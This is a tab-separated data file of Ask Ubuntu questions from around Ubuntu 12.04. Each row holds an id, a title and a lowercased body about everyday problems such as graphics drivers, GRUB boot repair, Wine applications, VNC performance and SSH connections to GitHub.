136142	usb ubuntu updating free space problems	i like to have always with me a usb version of ubuntu . it 's often useful . so i can have in any case all my documents and settings everywhere even on pcs where only windows is installed , or i can try to recover/backup pcs that have some problems . the problem is that it 's impossible to upgrade or install new software on it . it takes a lot of space ( you ca n't do all the updates , you can only do few of them , only few times ! ! ! ) . why is n't it possible ? how can i free the occuped space after each update ? i tryed to set synaptc so to delete file after installation , on its settings menu , but it seems that it does n't work . in any case , after every update , you have always less and less free space . many thanks , giuseppe privitera
136143	12.04 & nvidia problem : which card series work ?	i upgraded an acer extensa with an integrated nvidia 7050/nv620i , from 10.04 to 12.04 . ( full reinstall ) with the buggy nvidia driver 295.40 , the system was unuable . i downloaded from nvidia site and manually installed the following drivers that does n't work perfectly : 295.49 ; 295.33 ; 302.07 ( beta ) ; the situation was better than 295.40 , but still non usable . moving from one desktop to another keep 2 seconds . clicking on hour/date applet on top bar , shows the small windows drawing slowly ... . what can nvidia user do ? is it possible to state which nvidia series works by sure : 100 , 200 , 400 , 500 ? ? which one ? for production environment , is changing card brand the only viable solution ?
136146	software to connect a professional digital camera	my brother has a canon eos 310 which frankly scares the bejesus out of me when i hold it because is heavy ( and expensive ) . anyway i am trying to get the pictures from the camera to ubuntu but it only detects it as a pen drive . what software exists to open , view and extract the images from this camera .
136148	upgrade from 11.10 to 12.04 - no upgrade option available in update manager	update manger do not provide option to upgrade . it displays `` your system is up-to-date '' instead . i tried check button many times but received same message . please help .
136149	how to get nvidia graphics working on sony z laptop ?	i have an older sony vaio z 590 laptop with switchable graphics between intel and nvidia geforce 9300m . it is not optimus . i did a clean install of ubuntu 12.04 . everything works , but it 's using unity 2d with the intel drivers . i 've tried loading the nvidia drivers from `` additional drivers '' , but it says `` this driver is activated but not currently in use '' . when i run `` nvidia-settings '' , an error window pops up to say `` you do not appear to be using the nvidia x drivers . '' `` lspci '' shows both graphics cards . let me know if i should add more info . how do i get the nvidia graphics and unity 3d working ? more info : $ lshw -short -class display h/w path device class description ============================================== /0/100/1/0 display g98 [ geforce 9300m gs ] /0/100/2 display mobile 4 series chipset integrated graphics c $ glxinfo name of display : :0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . excerpts from xorg.0.log : [ 16.373 ] ( ii ) loadmodule : `` glx '' [ 16.373 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 16.386 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 16.386 ] compiled for 4.0.2 , module version = 1.0.0 [ 16.386 ] module class : x.org server extension [ 16.386 ] ( ii ) nvidia glx module 295.49 tue may 1 00:09:10 pdt 2012 [ 16.608 ] ( ii ) nvidia dlloader x driver 295.49 mon apr 30 23:48:24 pdt 2012 [ 16.608 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 17.693 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found )
136150	what is the name of the package for r ?	i tried aptitude search r , but ( unsurprisingly ) , there are waaaay too many results to sift through .
136152	convert via terminal crw format to jpg or png	how can i convert crw format images to jpg or png via terminal . tried convert and mogrify with no luck . it gave a weird corrupted error while processing the crw files but i can view them fine using shotwell for example .
136158	ubuntu update , graphics not detected	i recently updated my ubuntu operating system with the available updates . now when i try to turn on my computer it tells me my system is running in low-graphics mode and that my screen , graphics card , and input devices could not be detected properly . you will need to configure these yourself . after this message i am presented with a few options , run in low graphics mode for this session , reconfigure graphics - ( does nothing ) , trouble shoot error - ( allows me to review log file , startup errors , edit configuration file , and archive configurations and logs . ) and exit to console log in . both run in low graphics mode and exit to console log in result in a black screen . and my computer just sits there . i have no idea what to do . there is n't anything super important on the computer so i would n't mind wiping it , but i do n't know how to do that from a blank screen . any advice would be welcomed . *side note i have a hp pavillion tx2500
136161	can compiz be installed on ubuntu 11.10 ?	i always used compiz with debian , does it work correctly with ubuntu 11.10 ? if yes , what is the command that i need use to install it ?
136165	how to create iso images ?	let 's says that i have a microsoft office 2010 on a .zip file , then i extract it into a folder , and now i want to build a .iso file from the files inside this folder . how can i do that ?
136166	how to get multitouch gestures on ubuntu 12.04 ?	i just got a dell xps 14z that has a multi touch pad , and i want to get some gestures besides the two finger scrolling . i 've had some bad experiences with trying to figure things out by myself with ubuntu and i always end up messing something up and reinstalling , so i would like instructions , please .
136171	how do i get hdmi out working with bumblebee ?	this is a repost of a questions i posted in another question thread that contained other questions . previous quetioni just pulled this out of that question . system : asus n43j intel i5 2.53ghz nvidia geforce gt425m vram1gb dual boot win7 & ubuntu 12.04 i ca n't get the hdmi to work . i 've read all kinds of posts , websites , suggestions for about 2 weeks now , ever since 12.04 came out . i ca n't find anything that works . i 'm using bumblebee , following the wiki and several other websites , including this : askubuntu how well ... . bumblebee appears to be working when i use the optirun glxspheres or . however , the hdmi is n't working . when i plug it into the tv , nothing happens ( like the desktop showing up on the tv ) . but , when i run , say `` optirun totem '' , the screen goes black , like it is trying , but nothing is being transmitted . when i take out the cable , the little screensaver on the tv comes back . i saw this video : bumblebee nvidia optimus hdmi support on kde . he 's using the ( apparently ) exact laptop i 'm using . all seems to be working . any help here ? i ca n't get hdmi to work . bumblebee seems to be doing fine , as i can optirun program just fine , and when i optirun vlc/totem , the above happens .
136173	what 's the best way to burn a video file to a dvd ?	i have a few high quality video files in a number of formats . i 'd like to burn them so i can watch them on my dvd player . i 'd like a program similar to nero , which can transcode the files and burn them to a dvd , as well as doing things like automatically splitting the video up into chapters . quality is very important : my files are 1080p blu-ray rips , and i 'd like control over video and audio quality .
136186	could not display `` x-nautilus-desktop : ///	i am receiving this error after a new install of ubuntu 12.04 lts to a dell inspiron 9300 . any ideas why ? having trouble finding any answers by searching .
136187	my home bank doesn路t work well	using firefox or chromium it路s not possible to pay bills or transfer money on itau website . i was able to do this at ubuntu 11.10 . it demand to install a java script on browser , but it not occur . my open jdk java is 7 .
136189	could not read dvd despite having restricted extras	i still ca n't seem to play movie dvds on my ubuntu 11.10 even after installing restricted extras and after trying this this [ a ] is the error message that i get with movie player . vlc does n't play the dvd either . what gives [ a ] could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed .
136192	world of warcraft with wine disabling sound output for other programs	this problem seems to be opposite of any other wine sound problems , sound works beautifully in world of warcraft under wine , but it remove all audio output for other programs such as mangler and the system sound test program . i have tried starting programs before and after wow to see if that will make the audio work but that does n't help , i 'm all out of ideas .
136193	how can i get transparent right click menus back in ubuntu 12.04 ?	before upgrading to 12.04 , i was running 11.10 . i had a compiz setting enabled via ubuntu tweak . that setting was 'enable transparent menus ' . this option allowed all 'right click menus ' to be partially transparent , a feature i have grown fond of . after upgrading to 12.04 , i am unable to locate this option . i have installed all of the same packages that were on 11.10 , so packages are n't the problem . i would like to know , where can i enable this ? and was this feature removed ? thanks !
136194	juniper setup on 12.04	i have a laptop with windows xp and ubuntu 12.04 ( 32 bits ) . until now , i used windows xp to connect to a juniper vpn but now i 'd like to try it with linux . i read the mad scientist walkthrough ( including the sun java part ) but i ca n't run the setup . i get the popup that ask me if i 'm sure i want to run the applet but then , nothing . mad-scientist says it 's probably a c runtime lib problem and suggests to use his script with -nojava but he does n't say how to install network connect in the first place . any idea ? thanks for any suggestion ! laurian ps : i have : ubuntu 12.04 32bits java from sun 1.6.0.32 firefox 12 xterm ( i think it was suggested somehwere )
136196	how much swap do i really need ?	i have a 4 gb ram and 300 gb hdd with 8 gb of it as a swap partition . i 'm running 12.04 with hibernate enabled . how much swap do i really need ? i do n't think i 've ever seen my swap percentage use reach even 1 % . so how much do i really need ?
136202	java jre will not install due to `` tar : error is not recoverable '' error	i have been trying to get java for the past day now . i followed several tutorials but i keep getting the same error . after i put in tar -xvf jre-7u4-linux-i586.tar.gz it says can not open : no such file or directory tar : error is not recoverable : exiting now i have a 64 bit system so i doubt that 's the problem . the jdk installed perfectly , but i 'm lost as to why the jre wont work ...
136209	computer does n't boot after installing ubuntu 12.04 on top of windows 7	i installed ubuntu 12.04 in my computer without problems , but after rebooting i got the following error error : no such partition grub rescue > i know this is a common problem and i tryed all the solutions i found before posting this question . i tryed to restore the grub using the following commands ( from this guide ) : 1. sudo mount /dev/sda6 /mnt 2. sudo mount -- bind /dev /mnt/dev 3. sudo mount -- bind /proc /mnt/proc 4. sudo mount -- bind /sys /mnt/sys 5. sudo mount -- bind /usr/ /mnt/usr 6. sudo chroot /mnt 7. update-grub 8. grub-install /dev/sda 9. sudo grub-install -- recheck /dev/sda 10. sudo umount /mnt/dev 11. sudo umount /mnt/proc 12. sudo umount /mnt/sys 13. sudo umount /mnt/boot 14. sudo umount /mnt/usr 15. sudo umount /mnt 16. sudo reboot but after executing those commands i still ca n't boot . on my previous tries after executing grub-install i got 2 warnings about some application called flexnet was occupying sectors 33 and 34 . so i removed those sectors and now there is n't any warning . this seems to be a problem specific to my laptop , because when i change the hard drive to another laptop the grub loads fine . i have a hp compaq 7300 in case that would help , and i installed ubuntu using a liveusb . any help would be really apreciated , thanks . output from : sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x7db8a635 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 125833215 62813184 7 hpfs/ntfs/exfat /dev/sda3 125833216 283121663 78644224 7 hpfs/ntfs/exfat /dev/sda4 283123710 312580095 14728193 5 extended /dev/sda5 310505472 312580095 1037312 82 linux swap / solaris /dev/sda6 283123712 310505471 13690880 83 linux
136213	ubuntu not working after upgrade from 11.10 to 12.04 on asus u36s	i have an asus u36s , and no problems using ubuntu 11.10 . few hours ago , i upgraded to 12.04 and now nothing works ( neither mouse nor almost nothing ) i can reboot the system and sometimes the keyboard seems to be more or less configured , so i can type some commands in terminal `` f2 '' ( do n't know why not in the first one , e.g . ) and other times , i ca n't even login using another terminal but the graphic interface . anyway , login by this interface , i ca n't get to execute anything using a terminal into this one . should i try to go back to 11.10 ? any other solution known ? : s thanks in advance to any help .
136218	ip camera viewer	hey there i am looking for an application to view our ip camera . we have a web interface , but it sucks and takes forever to load . i know there are several windows options available , many of them even free . i have not had any luck finding one for ubuntu though . to be clear , this is not for a webcam , but rather a wireless ip camera . also , i am not looking for a recording server , just a handy viewer . thanks !
136219	vnc session very slow in 12.04 compared to older versions	i have a 12.04 x64 desktop install on a machine where i previously had 10.10 . previously i 've used both the built-in vino and tightvncserver to provide the vnc session . i connect to them using chicken of the vnc on my mac . with the older version , vnc performance was pretty good . now with 12.04 , it is abysmal using vino . updates are sluggish , menus flicker and vanish , lots of extra screen redraws , etc . any pointers on recovering some performance ? thanks .
136222	how can i change google earth 's `` win 98 '' appearance on xubuntu ?	installation went as expected , everything works fine except for that ugly win 98 style in the menus . i tried the font solution i found on some forums but it 's nothing to do . any other with this problem ?
136232	default user id at login different from user name in terminal shell	during the ubuntu 12.04 lts installation , i was prompted to enter a user name and password , so that a corresponding account could be created and set up for login . i replaced the one that was provided by default ( i.e . '70319 ' , which is the windows 7 admin id ) with a user name/id of my choosing . now , when i turn on the computer , and choose to enter the ubuntu operating system , the login id that is displayed is 70319 - that is , the one provided by windows 7 . however , when i open up a unix/terminal shell , the user id that is displayed at the prompt is the one i entered during installation . otherwise , the installation of ubuntu was a success ! is there some way of changing the user id that is displayed at the login screen , so that it is consistent with the one i entered during installation ? if it 's any help , i installed ubuntu using wubi on an asus eee pc 1011px running windows 7 , and asus express gate cloud . further details regarding the setup/installation can be found at the following link : installing ubuntu on an eee pc 1011px
136246	outlook 2010 with playonlinux , certificate error	i installed outlook 2010 32bit on a 64bit ubuntu using playonlinux . installation ended successfully . since our organization uses a self-signed certificate , i had to import it in playonlinux or wine to be able to conncet to my mail . i used wine /path/to/control.exe/in/playonlinux/control.exe and then went to `` internet setting '' . there , i imported the certificate in root trusted authorities . despite doing all these , creating a profile on outlook will not succeed . using wireshark , i noticed that the error returned is alert ( level fatal description unknown ca ) . i am guessing the certificates are not imported properly . any suggestions ? update : i could not find what i was looking for . but to make things work temporary , i used davmail and setup my account as an internetmail in outlook . i will update this post if anything new happens .
136247	install a minimal 64bit ubuntu 12.04 server virtual machine to use alongside a 32bit ubuntu 12.04 ?	i would like to install a minimal 64bit ubuntu 12.04 server virtual machine to basically be able to use a terminal to run 64bit code alongside my 32bit ubuntu 12.04 gnome session on my 64bit virt-enabled laptop . where can i find the installation instructions for the best option to achieve my goal ? virtualbox ? vmware ? something else ?
136254	how to install flash stream hunter_1.0.10.exe in ubuntu 10.04 lts	i am new in linux operating system , please inform me how to install flash stream hunter software in ubuntu 10.04 lts .
136255	how to disable rhythmbox cover-art ?	how can i disable the cover-art ( thumbnail that appears in left bottom corner ) in rhythmbox music player ?
136256	what is the package name of the lock screen ?	after reading a review of the ubuntu developer summit which said that one of the proposed changes in 12.10 would be to use lightdm as the lock screen : lightdm will be implemented as the lock-screen , thus adding visual and behavioural consistency to the desktop . source i was wondering what is the package name of the current lock-screen , or is it a part of the unity package ? as clarification it is this screen i am referring to :
136257	firefox banking certificates	i 'm using online banking on firefox that requires me to import my personal certificate into the browser i use . bank access is via their webpage , using pass and personal certificates . my question is , where does firefox store my personal certifications and how safe are they ? is it done via passwords and keys applications ? also what are my options to store the certificate on a usb stick and use it with firefox when accessing bank ? how do i achieve this if the bank page requires the personal certificate to be imported into a browser to access their page ?
136260	how to set one virtual desktop as the `` external monitor '' source on 12.04 ?	on my laptop using 12.04 i would like to have two virtual desktops , one should be visable only to the person using the computer and the other should be the one that is shown when i attach an external device . at the moment i use the `` mirror display '' ( not sure about the english name for it ) functionallity or the `` not mirror display '' option , but with different virtual desktops it would be nice to set up the `` external monitor '' before and afterwards look at some notes while giving talks etc . how can i ajust the settings to achieve this ? saw a lot of old questions , but no real solution . maybe this got better with precise multi-monitor support .
136263	moonlight not working on firefox or chromium - ubuntu 11.04	i 'm trying to watch my sky films but i need silverlight of course . i have tried downloading moonlight 4 on chromium - says : can not unzip package so does not finish download in the latest firefox of course it 's not compatible ( yet ? ) i 'm new to ubuntu , i can follow instructions is there anyway i can get around this ?
136264	how do i turn off all the password prompts ?	i 've been using ubuntu 12.04 lts since release and am trying to figure out a couple things about all of these passwords and key-ring prompts that i 've just been living with for a while . ever since install it seems that every time i boot up my computer and want to do anything ( ie . use the internet , use a internet browser , install something , delete something , pick my nose ) i 'm always prompted for either a normal password entry or a key-ring password entry . is there anyway to turn off all of this `` security '' and tell my ubuntu that it can trust what i 'm doing and go take a shower ?
136266	ubuntu 12.04 google-earth install anomaly	i tried out more methods : the result was identical . no way utf-8 to set characters . it lsb-core and the ttf-mscorefonts packets are installed . i can not reach it , that it utf-8 letters the google-earth let them appear in his choice.in hungary the öőőőüüűűííóóááéé characters fundamental ... : ( google-earth version : 6.2
136278	why is mobile broadband connection not shown in the network manager in 12.04 ?	i have created a mobile broadband connection using bluetooth in ubuntu 12.04 but it is missing in the network manager icon on the top panel of the desktop . how should i solve this problem ? when i create a connection using dsl , it is displayed in network manager . but why it is not displaying for mobile broadband connection ?
136280	what happens if i disable and unistall plymouth ?	i have this problem with plymouth , in wich it does n't show up or , when it shows , with a awful resolution . so , i wanted to uninstall plymouth ( i found the package in synaptics ) . i 'm using ubuntu 12.04 lts , in dual-boot with windows 7 . and i wanted to know : what happens if i uninstall plymouth ? am i going to be able to boot to ubuntu ( and windows 7 ) ? is my boot going to be faster ? can i reinstall it , if i want ? is there a better way to uninstall it ? if i do n't disable it before i unistall it , am i going to have trouble ? thanks for your help !
136282	login sound disabled	i 'm using ubuntu 12.04 on my lenovo g550 . i noticed that ubuntu disabled the startup sound played after login ( i love it ) . i did some googling and found on ubuntugeek that we have to add this command /usr/bin/canberra-gtk-play -- id=”desktop-login” -- description=”gnome login sound” to startup applications . i did that but i still do n't hear the sound .
136284	when installing software with wine it does not put an icon on the applications menu . xubuntu 10.04	when i install software with wine it appears to install correctly but does not add that program to the applications menu . i do n't know the command to run the program from the command line so i can never run that program except through the wine installation command . how do i add that program to the menu ? i am running wine from the terminal , but i believe the result is the same when starting it from the menu . thanks , daniel
136292	what can i do about the fglrx driver interfering with jackd ?	the jack-audio-connection-kit needs to run in realtime mode and my system is configured accordingly . i 'm using the fglxr driver . with unity-2d everything is fine . with unity-3d , jack-clients disconnect from jack very often , usually when something happens to windows ( being drawn first time , brought to front , opening menus ... ) . it 's still the same driver , but it seems like the 3d accleration part of it is not preemptable . what are my options besides sticking to unity-2d ( i really painfully miss window drop- shadows ) ? i did not even find a way to report a bug against the driver itself , and do not know how to further diagnose the issue , anyway .
136295	ubuntustudio 12.04 unable to recognize sound hardwares on my desktop pc	my general system info : ubuntu 12.04 ( precise ) kernel 3.2.0-23-lowlatency ( # 31-ubuntu smp preempt wed apr 11 02:24:03 utc 2012 ) sound card amd nee ati sbx00azalea ( intel hda ) rev 40 nvidia unix x86_64 kernel module 295.40 thu apr 5 21:37:00 pdt 2012
136298	start gnome-shell from another session/terminal/user	sometimes my gnome shell gets a weird bug . what i need to do then is to click e.g ctrl + alt + f3 when i am there i can login and then killall gnome-shell then i go back to the first ctrl + alt + f1 ( what do you call them tty1 , tty2 , tty3 ... ) back there i can sometimes open a terminal and enter : gnome-shell but sometimes it does n't work , like now , because the browser window has the focus and no other windows has , and i ca n't start gnome-shell from the browser , so that 's why i am asking the question now : ) . the thing that i have tried is to export the display when i am in the tty2 or tty3 , not the one with graphics in export display=:0.0 gnome-shell but i guess that the :0.0 display is n't the main display ? , anyway i can at least start the gnome-shell but it results in an error . it is not the ca n't find an x display error , but another one that has something to do with the top-bar and the extensions . does anyone know how to start the gnome-shell from another `` tty '' thing ?
136306	ca n't install ubuntu on asus eee 1015pem	i 'm having trouble to install ubuntu . i use an asus eee 1015pem netbook . recently , my netbook got wet . i had it inside my backback and all my things got wet . the netbook boots up fine but it will not load the os . i downloaded ubuntu onto my external hard drive and changed the settings in my bios to boot from a removable device . nothing happens . when i plug in my external hard drive i 'm not able to get to the boot icon . i have to unplug the external hard drive . for my boot settings i tried both removable and cd-rom . then i plugged my external drive back in and nothing happened with either setting . my asus never came with a recovery disk -- it 's suppose to have a build in recovery utility accessed by pressing f9 in the bios . also i need to disable boot booster in the bios and boot booster is not even an opition in the bios . my friend told me to try installing ubuntu but now i 'm having no luck with ubuntu . any suggestions ?
136308	question regarding partitions	hey guys , i want to install ubuntu alongside my windows 7 os . i'm trying to add an extended partition for the ext4 partition and the linux-swap partition , but i already have four primary partitions which all look like they 're something important . the four partitions are this : partition 1 : partition : /dev/sda1 file system : ntfs label : none size : 199.00mib used : 66.59 mib unused : 132.41mib flags : boot partition 2 : partition : /dev/sda2 file system : ntfs label : none size : 219.29gib used : 28.11gib unused : 191.17gib flags : none partition 3 : partition : /dev/sda3 file system : ntfs label : recovery size : 13.30gib used : 11.09gib unused : 2.22gib flags : none partition 4 : partition : /dev/sda4 file system : fat32 label : hp_tools size : 103.18mib used : 7.47mib unused : 95.71mib flags : lba i know that windows 7 is the /dev/sda2 and i 'd assume that /dev/sda3 is some sort of backup . i do n't know what /dev/sda4 but i 've watched a video that said that generally a fat32 partition is the boot or something . as for /dev/sda1 i have no idea . which one should i delete to make space for an extended partition ?
136310	how to add `` add to vlc playlist '' to the right click menu of nautilus ?	the problem while you are playing any song or other media file on vlc and open another such file , then another instance of vlc opens . ( you are n't going to hear and understand anything until you are a robot ) what i want i what to add a `` add to vlc playlist '' to the right click menu of nautilus as similar in windows .
136313	how to check the duration of a login session in 12.04	ok how do i know the the number/hours i have logged in ? i just want to know the time i have spent since i logged in .
136314	which gstreamer package for which file types ?	i know that ubuntu-restricted-extras package provides many more multimedia codecs , flash and java support . but it is a big download and i do n't need support for file types , which i am not using now . so , does anybody know which gstreamer package provides which kind of file type support ? a list like gstreamer-ffmpeg - > .mp4 , ... will be very useful . and i have another question , ( i still confused , should i ask it here or in another question ) is it ok to only install the gstreamer packages for all multimedia needs ? or i need some other packages ? and for what needs ?
136324	always boots into 2d mode	i have ubuntu 12.04 and initially choosing normal ubuntu at login gave me ubuntu 3d . however , for a few days now , selecting either ubuntu or ubuntu 2d gives me 2d : ~ $ echo $ desktop_session ubuntu-2d
136330	software on two accounts	on ubuntu i have two accounts one for me and one for my sister . i downloaded a game off the ubuntu software center but i can only play it when logged in to my account ( the one i download it on ) but now my sister wants to play it on her account . is there a way to have it on two accounts with out downloading it again as i have a limited dowload amount . i have had a look around and seen that it could not be down but that was on an older system .
136331	is there any text-editor which support markdown ( ask ubuntu style ) editing ?	is there any text editor which supports markdown ( ask ubuntu style formatting ) which can be used to write questions or answers while you are offline ?
136345	how to script a mount command involving a dm-crypt / luks volume	i am trying to make a script that will mount an encrypted volume ( dm-crypt / luks ) with a password that is passed as argument to that script . my trouble is that i ca n't find a way to make that script work ... for instance , when i run this : mount /my/encrypted/path > file.txt 2 > & 1 it still shows me the password question outside the script and let me type the password ... . it 's just like the mount command found a way to escape the redirections that i 've set ... . so it 's impossible for me now to input a password due to the fact that the part that ask me the password runs outside my script ... .. how mount found a way to escape redirection ? i do n't know . do i have to change some configuration file ? i do n't know . is mount has some luks specific commands ? i do n't know . how can i mount an encrypted volume via a script without having `` human '' interaction with my script ( aka : my script type the password ) ? i know that what i try to achieve may represent a security risk ... . but the password will be transferred in a secure way to the script ( so do not care about the potential security risk that it can involve ) . in case this matters : i try to achieve this under ubuntu 64bit 11.10 .
136346	create unity shortcuts to wine applications 12.04	i have just gone through the process of getting ubuntu onto my main pc , no issues , was absolutely brilliant how its done it and loved that i could read the web while installing too , i have wine installed and world of warcraft works fine having copied the installation over from the existing windows partition that i have in place , the only trouble i am having now is creating a meaningful shortcut for the application to launch it direct , rather than browsing the directory and double clicking launcher to start it off . i have followed every angle possible on here and google search so far and it seems to have not worked , i want to know is this possible and should i just go with a new download and installation to my home directory rather than just copying the files over to the new /home directory and running them through there or am i missing something easy here ?
136348	can not boot into windows 7 after installing ubuntu 12.04	i installed ubuntu 12.04 alongside windows 7 on a separate partition , with mount point '/ ' and boot load information on windows 7 drive ( settings , prior to installing ubuntu ) . when i start the system , grub boot loader shows both options for selection but when windows 7 is selected , screen just goes blank for less than a second and grub menu reappears . i checked in file explorer in ubuntu and the drive of windows 7 is still as it should be . how do i get windows 7 back running , i need it badly ... ? and i could not get any proper answer for it , i have already googled it , so please do not advice that . please give me some proper explanation for solution or if you find any link properly explaining the solution , you can paste it here .
136349	i ca n't start xubuntu 64bit ! xorg problem ? ?	is it possible that after using this command xubuntu wo n't start ? ? i used it in order to change google earth 's appearance and when i restart i get a black screen and hangs there . is there any way to change what this command did . btw , i am not 100 % sure this was the reason but it was the only `` strange '' thing i did . or perhaps restore to a previous point like winbugs ? ? i also upgraded my system ( security and recommended upgrades only ) . thanks in advance . gconftool-2 -- set -- type string /desktop/gnome/interface/gtk_theme your-theme-name i read some minutes ago something about that xorg thing causing problems . i remember that figured in the list of security fixes . how can i remove/fix it ?
136351	how to upgrade the linux mainline 3.3.6 kernel ?	i want to install the latest stable linux kernel 3.3.6 . can someone please help me with a step by step guide ? thanks in advance btw i 'm on a 64bit system and i have downloaded the following amd64debs from kernel.ubuntu.com : linux-headers-3.3.6-030306-generic_3.3.6-030306.201205121335_amd64.deb linux-headers-3.3.6-030306_3.3.6-030306.201205121335_all.deb linux-image-3.3.6-030306-generic_3.3.6-030306.201205121335_amd64.deb
136352	sony e-reader opens shotwell and displays content of /media/setting	when i connect my sony prs-t1 e-reader ubuntu 12.04 opens the removable media 's default photo app ( shotwell ) and then displays the contents of one of the two drives : /media/setting . the other drive is /media/reader . both drives are mounted in the launcher , btw . the only obvious way to prevent the above is to check `` never prompt or start media upon insertion '' in system settings / details / removable media . but then i have to go without automatic launching of apps for cds , dvds and photos . i 'd like the e-reader to open calibre ( and also keep the other automagic stuff ) but without the annoying aberrations . does anyone know how ? i 've read that i could add an empty document entitled .is_audio_device to the root of an msc which will tell ubuntu to open a usb stick , for example , as an audio device . could i do the same with the ereader ? but what would the title be ? would it be .is.ebook_device or .is.ereader_device or something else ? thanks for your help . bingo
136356	allow `` root '' program to run without privileges	i 've changed my ctrl-alt-l shortcut so instead of just locking the screen , the system goes into suspend . ( for reference , the command is gksudo pm-suspend-hybrid ) as you can see , the program needs to be run as root , so i added the gksudo . i 'd really like to get the system to suspend without having to enter the password . is there any way i can do this ?
136368	ca n't see my old /home	i had ubuntu 12.04 installed with separeted home , i have reinstalled it due to an error of my graphic card , and i choose to format the partition with ubuntu with ext4 , and for the home partition i choose `` use this partition '' `` ext4 '' but `` do n't format this partition '' now if i go in `` file system > home i can see my old directory with my files , but when i go in the home folder directly from the dash i enter in a new empty home ... .how can i merge this 2 home ?
136378	boot loading problem after wubi installation of ubuntu 12.04 on windows 7	i was new in ubuntu os and i was just trying to use wubi windows installer to get a ubuntu first for hands-on . i followed exactly the same as the instructions and after reboot win7 , there is no ubuntu selection in windows boot manager , with only windows 7 showing there evilly -.- what i 've found out was that the grub folder inside ubuntu folder ( in my c : \ drive ) was empty , either inside the ubuntu\disks\grub or ubuntu\install\grub . i thought this might be the reason why i could not load ubuntu during startup . cause i 've also looked into the easybcd settings , and ubuntu entry with bootloader path : \ubuntu\winboot\wubildr.mbr was lying there peacefully , looking perfectly fine . however it was not in boot loader actually . is there a way to restore the grub folder with grub2 , or is there any way to fix this problem so that i can find the `` ubuntu '' selection at windows startup ? very appreciate your help : ) henry
136379	git ssh error : port 22 : no route to host	i tried to use set up git and use it for github , then when i followed the help doc , but when i got to step 5 of the set up ssh keys section : test everything out , when i used this command : ssh -t git @ github.com i got an error : ssh : connect to host github.com port 22 : no route to host then i used this command : ssh -vt git @ github.com here is what i got : openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /home/jacos/.ssh/config debug1 : applying options for github.com debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to github.com [ 207.97.227.239 ] port 22. debug1 : connect to address 207.97.227.239 port 22 : no route to host ssh : connect to host github.com port 22 : no route to host i googled for a while and found i have to check if the iptables blocked the port . so here is the result : ~ $ sudo /sbin/iptables -l -n [ sudo ] password for jacos : chain input ( policy accept ) target prot opt source destination accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53 chain forward ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 10.42.43.0/24 state related , established accept all -- 10.42.43.0/24 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain output ( policy accept ) target prot opt source destination and i tried the command suggested by gilles : tcptraceroute github.com 22 here is what i got : selected device eth0 , address 222.20.58.xx ( sorry ... i masked part of my ip ) , port 33281 for outgoing packets tracing the path to github.com ( 207.97.227.239 ) on tcp port 22 ( ssh ) , 30 hops max 1 222.20.58.254 0.891 ms 0.850 ms 0.693 ms 2 zxq-xs-h3c7510e.hust.edu.cn ( 115.156.255.137 ) 1.253 ms 1.569 ms 2.837 ms 3 zxq-xs-rjs8606.hust.edu.cn ( 115.156.255.130 ) 0.729 ms 0.678 ms 0.629 ms 4 115.156.255.174 0.794 ms 6.279 ms 16.569 ms 5 * * * 6 * * * 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * destination not reached it seems that the route is stopped at 115.156.255.174 , which i do n't know where it is . i ca n't figure out what it means . does it block port 22 ? by the way , i can access the internet and visit github.com . and i am using ubuntu 11.10 . can anyone help with this ? thanks !
136380	12.04 wireless network asks for wep key every 5 minutes , please help	i am running ubuntu 12.04 64bit desktop i am connecting to my home wi-fi using wep key , like i do with all of my other devices . there is no issue with the wi-fi as none of my other devices have this problem . every 5 minutes give or take , i will get a request to enter the wep key for my network . even though i am connected with no problems . through trial an error i have learnt that choosing either connect , or cancel will give exactly the same result . another notification saying wireless disconnected - yet i am still connected , everything is working . i just continually get the request to enter my wep key , i am connected the whole time , despite the alerts i receive . its quite irritating having to have to stop working on whatever i am working on at the time , every 5 minutes just to get rid of the wep key pop up . i have also checked my drivers , i have the correct one for my wireless . and it is working and active . has anyone else had this issue and know how to resolve it ? hope someone can help . cheers
136382	how can i make a desktop shortcut to the game ut2004 ?	i want to make a shortcut on the desktop that will open the game unreal tournament 2004 . usually in terminal i type : sudo aoss ut2004 but when i make a shortcut and type the command in it , it does n't open . what can i do in order to create a working shortcut ? also , i have ubuntu 12.4 lts if that helps .
